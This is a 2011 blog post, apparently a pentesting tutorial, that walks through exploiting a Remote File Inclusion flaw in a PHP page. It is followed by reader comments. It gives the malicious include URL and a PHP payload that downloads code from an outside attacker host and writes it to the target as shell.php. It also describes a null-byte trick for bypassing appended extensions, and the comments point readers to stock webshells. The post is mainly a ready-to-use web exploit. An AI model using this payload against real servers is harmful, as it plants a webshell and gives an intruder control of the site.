Saturday, 5 March 2011

How to exploit RFI (Remote File Include) vulnerability on webpages.



Hi everyone, this post is really similar to the one that I just made ( LFI ), the only difference is that you can include your own code into the remote server more easily.
So, this is our vuln wepage :
http://mytargettest.com/hacktest/rfi.php?COLOR=color.css
BUT instead loading the file color.css, we will be loading our own code to that box like this :

http://mytargettest.com/hacktest/rfi.php?COLOR=http://172.16.1.79/exploits/evil3.txt

The content of evil3.txt is :

<?php $z=fopen('./shell.php','w');fwrite($z,file_get_contents('http://172.16.1.79/exploits/back.txt'));fclose($z); ?>

If you notice the extension of the file is .txt, there is a reason for that, if you put .php, the code will be interpreted by the pentest server instead the target server, don't forget to put .txt in your evil code.
Great, we just uploaded our shell to the server now browse it : http://mytargettest.com/hacktest/shell.php
Now you can just repeat what I did in the LFI post to get your real shell in the server.

Another Tip: Some developers try to include the extension like .css or .php or .any other extension, ok, so how can we avoid that? You just add a NULLBYTE in the end of the URL.

6 comments:

  1. You should read the whole post.
    "If you notice the extension of the file is .txt, there is a reason for that, if you put .php, the code will be interpreted by the pentest server instead the target server, don't forget to put .txt in your evil code."

    ReplyDelete
    Replies
    1. I mean, the file back.txt at that site because there is not active.
      Where can I find it?
      Can you send me by mail?

      Delete
  2. back.txt is your "evil" code, that can be anything... your shell, commands, anything... if you want a shell, inside backtrack there is some in /pentest/backdoors/web/webshells/

    Have a look.
    I don't speak italian.

    ReplyDelete
  3. OOOOOOOOOkay, now i understand :)
    Thanks a lot!

    ReplyDelete